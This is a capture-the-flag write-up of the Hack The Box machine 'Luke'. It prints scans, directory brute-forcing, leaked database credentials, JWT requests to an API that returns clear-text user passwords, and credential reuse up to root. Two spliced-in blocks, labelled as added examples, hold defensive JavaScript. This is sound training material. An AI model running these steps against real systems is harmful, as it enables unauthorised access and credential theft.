


Hack The Box - Luke

Quick Summary

Hey guys, today Luke retired and here’s my write-up about it. It was an easy machine; all you need to do is enumerate well and you’ll find what you need. It’s a FreeBSD box and its IP is 10.10.10.137. I added it to /etc/hosts as luke.htb. Let’s jump right in!


Nmap

As always we will start with nmap to scan for open ports and services :

root@kali:~/Desktop/HTB/boxes/luke# nmap -sV -sT -sC -o nmapinitial luke.htb
Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-13 12:57 EET
Nmap scan report for luke.htb (10.10.10.137)
Host is up (0.23s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3+ (ext.1)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0             512 Apr 14 12:35 webapp
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.xx.xx
|      Logged in as ftp
|      TYPE: ASCII
|      No session upload bandwidth limit
|      No session download bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3+ (ext.1) - secure, fast, stable
|_End of status
22/tcp   open  ssh?
80/tcp   open  http    Apache httpd 2.4.38 ((FreeBSD) PHP/7.3.3)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.38 (FreeBSD) PHP/7.3.3
|_http-title: Luke
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
8000/tcp open  http    Ajenti http control panel
|_http-title: Ajenti

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 202.84 seconds
root@kali:~/Desktop/HTB/boxes/luke# 

We have ftp on port 21, ssh on port 22, and http on ports 80, 3000 and 8000. From the scan output we can see that there’s a Node.js application on port 3000 and the Ajenti administration panel on port 8000. But before checking the web services let’s take a look at ftp.

FTP

Anonymous login was allowed. There was only one directory, called webapp, which had a text file called for_Chihiro.txt:

root@kali:~/Desktop/HTB/boxes/luke# ftp luke.htb
Connected to luke.htb.
220 vsFTPd 3.0.3+ (ext.1) ready...
Name (luke.htb:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls 
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0             512 Apr 14 12:35 webapp
226 Directory send OK.
ftp> cd webapp
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-r-xr-xr-x    1 0        0             306 Apr 14 12:37 for_Chihiro.txt
226 Directory send OK.
ftp> get for_Chihiro.txt
local: for_Chihiro.txt remote: for_Chihiro.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for for_Chihiro.txt (306 bytes).
226 Transfer complete.
306 bytes received in 0.00 secs (236.0412 kB/s)
ftp> 221 Goodbye.

for_Chihiro.txt :

Dear Chihiro !!

As you told me that you wanted to learn Web Development and Frontend, I can give you a little push by showing the sources of 
the actual website I've created .
Normally you should know where to look but hurry up because I will delete them soon because of our security policies ! 

Derry  

From this note we get two potential usernames : Chihiro and Derry.
Also, now we know that we can find some source files somewhere, let’s check out the web services.

Web Enumeration, User and Root Flags

On port 80 there was this simple website :



Nothing was really interesting so I bruteforced directories and pages with wfuzz :

root@kali:~/Desktop/HTB/boxes/luke# wfuzz -c --hc 404 -u http://luke.htb/FUZZ -w /usr/share/wordlists/dirb/common.txt  

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************

Target: http://luke.htb/FUZZ
Total requests: 4614

==================================================================
ID   Response   Lines      Word         Chars          Payload    
==================================================================

000011:  C=403      9 L       24 W          213 Ch        ".hta"
000001:  C=200    108 L      240 W         3138 Ch        ""
000012:  C=403      9 L       24 W          218 Ch        ".htaccess"
000013:  C=403      9 L       24 W          218 Ch        ".htpasswd"
001114:  C=301      7 L       20 W          228 Ch        "css"
002020:  C=200    108 L      240 W         3138 Ch        "index.html"
002179:  C=301      7 L       20 W          227 Ch        "js"
002282:  C=200     21 L      172 W         1093 Ch        "LICENSE"
002435:  C=401     12 L       46 W          381 Ch        "management"
002485:  C=301      7 L       20 W          231 Ch        "member"
004286:  C=301      7 L       20 W          231 Ch        "vendor"

Total time: 116.3713
Processed Requests: 4614
Filtered Requests: 4603
Requests/sec.: 39.64892

root@kali:~/Desktop/HTB/boxes/luke# wfuzz -c --hc 404 -u http://luke.htb/FUZZ.php -w /usr/share/wordlists/dirb/common.txt                                                                                         

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.                                                         

********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************

Target: http://luke.htb/FUZZ.php
Total requests: 4614

==================================================================
ID   Response   Lines      Word         Chars          Payload
==================================================================

000011:  C=403      9 L       24 W          217 Ch        ".hta"
000012:  C=403      9 L       24 W          222 Ch        ".htaccess"
000013:  C=403      9 L       24 W          222 Ch        ".htpasswd"
000994:  C=200      6 L       25 W          202 Ch        "config"
002347:  C=200     39 L      118 W         1593 Ch        "login"

Total time: 140.0363
Processed Requests: 4614
Filtered Requests: 4609
Requests/sec.: 32.94859

We got /management, /member, /login.php and /config.php. I checked config.php first :


$dbHost = 'localhost';
$dbUsername = 'root';
$dbPassword = 'Zk6heYCyv6ZE9Xcg';
$db = "login";
$conn = new mysqli($dbHost, $dbUsername, $dbPassword,$db) or die("Connect failed: %s\n". $conn -> error);

Great, we got database credentials. I tried to ssh into the box with them but it didn’t work.
/login.php:


Also the credentials didn’t work here.
/management :


It uses http basic authentication, I tried to login but again the credentials didn’t work.
/member was just empty :


On port 8000 there was Ajenti :


Ajenti: An admin’s tool for a more civilized age, providing you with a fast and secure way to manage a remote Linux box at any time using everyday tools like a web terminal, text editor, file manager and others. -ajenti.org

Ajenti provides a terminal, so if we could access Ajenti then we would get a shell. However, the credentials didn’t work here either:


The only thing left is the node.js application, which uses JWT tokens for authentication :

root@kali:~/Desktop/HTB/boxes/luke# curl http://luke.htb:3000/
{"success":false,"message":"Auth token is not supplied"}

I googled that error message and found this article on Medium: A guide for adding JWT token-based authentication to your single page Node.js applications.
I fuzzed the application to verify that the endpoint /login exists:

root@kali:~/Desktop/HTB/boxes/luke# wfuzz -c --hc 404 -u http://luke.htb:3000/FUZZ -w /usr/share/wordlists/dirb/common.txt

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************

Target: http://luke.htb:3000/FUZZ
Total requests: 4614

==================================================================
ID   Response   Lines      Word         Chars          Payload    
==================================================================

000001:  C=200      0 L        5 W           56 Ch        ""
002347:  C=200      0 L        2 W           13 Ch        "login"
002348:  C=200      0 L        2 W           13 Ch        "Login"
004245:  C=200      0 L        5 W           56 Ch        "users"

Total time: 147.3540
Processed Requests: 4614
Filtered Requests: 4610
Requests/sec.: 31.31234

/login exists, and there’s also another endpoint called /users which can’t be accessed without authentication either:

root@kali:~/Desktop/HTB/boxes/luke# curl http://luke.htb:3000/users
{"success":false,"message":"Auth token is not supplied"}

I tried to login with the credentials but it failed :

root@kali:~/Desktop/HTB/boxes/luke# curl --header "Content-Type: application/json" --request POST --data '{"password":"Zk6heYCyv6ZE9Xcg","username":"root"}' http://luke.htb:3000/login 
Forbidden

So I tried the same username from the article (admin) instead of root and it worked :

kali:~/Desktop/HTB/boxes/luke# curl --header "Content-Type: application/json" --request POST --data '{"password":"Zk6heYCyv6ZE9Xcg","username":"admin"}' http://luke.htb:3000/login 
{"success":true,"message":"Authentication successful!","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4MzczNjA0LCJleHAiOjE1Njg0NjAwMDR9.Xt854IyFtvP4nQbQa_l63hIJ3aewfVT98gqz5gfU5Us"}

Now we can access the application with our token :

root@kali:~/Desktop/HTB/boxes/luke# curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4MzczNjA0LCJleHAiOjE1Njg0NjAwMDR9.Xt854IyFtvP4nQbQa_l63hIJ3aewfVT98gqz5gfU5Us' http://luke.htb:3000/
{"message":"Welcome admin ! "}
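The token returned by /login is signed but not encrypted, so its header and claims can be read by anyone who holds it. The following is an added example, not part of the original write-up or the application: it decodes the token shown above and reports the algorithm, the claims and the lifetime. The function names and the "now" value are assumptions made for the example.

```javascript
// Added example: inspect the JWT from the write-up without any secret.
// A compact JWT is header.payload.signature, each segment base64url-encoded.
const TOKEN =
  'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.' +
  'eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4MzczNjA0LCJleHAiOjE1Njg0NjAwMDR9.' +
  'Xt854IyFtvP4nQbQa_l63hIJ3aewfVT98gqz5gfU5Us';

function b64urlToBuffer(segment) {
  // base64url uses '-' and '_' and drops '=' padding; map back to base64.
  const b64 = segment.replace(/-/g, '+').replace(/_/g, '/');
  return Buffer.from(b64 + '='.repeat((4 - (b64.length % 4)) % 4), 'base64');
}

function inspectJwt(token, nowSeconds) {
  const parts = token.split('.');
  if (parts.length !== 3) throw new Error('expected 3 dot-separated segments');
  const header = JSON.parse(b64urlToBuffer(parts[0]).toString('utf8'));
  const claims = JSON.parse(b64urlToBuffer(parts[1]).toString('utf8'));

  // Checks a reviewer would make on the decoded token.
  const findings = [];
  if (String(header.alg).toLowerCase() === 'none') findings.push('unsigned token (alg=none)');
  if (typeof claims.exp !== 'number') findings.push('no exp claim: token never expires');
  else if (nowSeconds >= claims.exp) findings.push('token is expired');

  const hasWindow = typeof claims.exp === 'number' && typeof claims.iat === 'number';
  return {
    alg: header.alg,
    claims,
    lifetimeSeconds: hasWindow ? claims.exp - claims.iat : null,
    signatureBytes: b64urlToBuffer(parts[2]).length, // 32 for HMAC-SHA256
    findings,
  };
}

// Constructed "now": a few seconds after the token's iat.
const report = inspectJwt(TOKEN, 1568373700);
console.log(report);
```

The only identity claim is `username`, and the token stays valid for 24 hours after issue.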

/users returned a list of these users :

root@kali:~/Desktop/HTB/boxes/luke# curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4MzczNjA0LCJleHAiOjE1Njg0NjAwMDR9.Xt854IyFtvP4nQbQa_l63hIJ3aewfVT98gqz5gfU5Us' http://luke.htb:3000/users
[{"ID":"1","name":"Admin","Role":"Superuser"},{"ID":"2","name":"Derry","Role":"Web Admin"},{"ID":"3","name":"Yuri","Role":"Beta Tester"},{"ID":"4","name":"Dory","Role":"Supporter"}]

After trying different things, /users/username revealed more info about each user :

root@kali:~/Desktop/HTB/boxes/luke# curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4MzczNjA0LCJleHAiOjE1Njg0NjAwMDR9.Xt854IyFtvP4nQbQa_l63hIJ3aewfVT98gqz5gfU5Us' http://luke.htb:3000/users/admin
{"name":"Admin","password":"WX5b7)>/rp$U)FW"}

root@kali:~/Desktop/HTB/boxes/luke# curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4MzczNjA0LCJleHAiOjE1Njg0NjAwMDR9.Xt854IyFtvP4nQbQa_l63hIJ3aewfVT98gqz5gfU5Us' http://luke.htb:3000/users/derry
{"name":"Derry","password":"rZ86wwLvx7jUxtch"}

root@kali:~/Desktop/HTB/boxes/luke# curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4MzczNjA0LCJleHAiOjE1Njg0NjAwMDR9.Xt854IyFtvP4nQbQa_l63hIJ3aewfVT98gqz5gfU5Us' http://luke.htb:3000/users/yuri
{"name":"Yuri","password":"bet@tester87"}

root@kali:~/Desktop/HTB/boxes/luke# curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4MzczNjA0LCJleHAiOjE1Njg0NjAwMDR9.Xt854IyFtvP4nQbQa_l63hIJ3aewfVT98gqz5gfU5Us' http://luke.htb:3000/users/dory
{"name":"Dory","password":"5y:!xa=ybfe)/QD"}
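The /users/<name> responses above hand the stored password, in clear text, to any caller with a valid token. The following is an added example, not the application's code: a check that flags credential-bearing fields in a JSON response body, next to an allow-list serializer that keeps them out. Field names follow the JSON shown above; the stored record and the function names are constructed for the example.

```javascript
// Added example, not the application's code. Field names follow the JSON
// shown in the write-up; the stored record below is constructed.
const SECRET_KEY = /^(pass(word|wd)?|pwd|secret|api[_-]?key)$/i;

// Walk a parsed JSON body and return the path of every field whose name
// suggests it carries a credential. Usable as an integration-test assertion.
function findSecretFields(value, path = '$') {
  if (Array.isArray(value)) {
    return value.flatMap((item, i) => findSecretFields(item, `${path}[${i}]`));
  }
  if (value === null || typeof value !== 'object') return [];
  return Object.entries(value).flatMap(([key, child]) => {
    const here = `${path}.${key}`;
    return (SECRET_KEY.test(key) ? [here] : []).concat(findSecretFields(child, here));
  });
}

// Allow-list serializer: a field leaves the API only if it is named here, so
// a column added to the user table later is private by default.
const PUBLIC_USER_FIELDS = ['ID', 'name', 'Role'];
function toPublicUser(record) {
  const out = {};
  for (const field of PUBLIC_USER_FIELDS) {
    if (Object.prototype.hasOwnProperty.call(record, field)) out[field] = record[field];
  }
  return out;
}

// Constructed stored record, shaped like the rows behind /users.
const storedUser = { ID: '2', name: 'Derry', Role: 'Web Admin', password: 'constructed-placeholder' };

// The detail response as the write-up shows it (name + password) versus the
// same record passed through the allow-list.
const leakyBody = { name: storedUser.name, password: storedUser.password };
const safeBody = toPublicUser(storedUser);

console.log('leaky:', findSecretFields(leakyBody));
console.log('safe: ', findSecretFields(safeBody));
```

Storing only a salted password hash removes the clear-text value at the source; the allow-list then keeps the hash itself out of responses.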

After trying these credentials everywhere, I could log in to /management as Derry:



These are the source files Derry was talking about in the note we got from the ftp server. In config.json I found some stuff related to Ajenti and I found the password for the user root :




Now we can start a terminal as root and get the flags :


And we owned root.

That’s it, feedback is appreciated!
Don’t forget to read the previous write-ups, tweet about the write-up if you liked it, and follow on Twitter @Ahm3d_H3sham.
Thanks for reading.
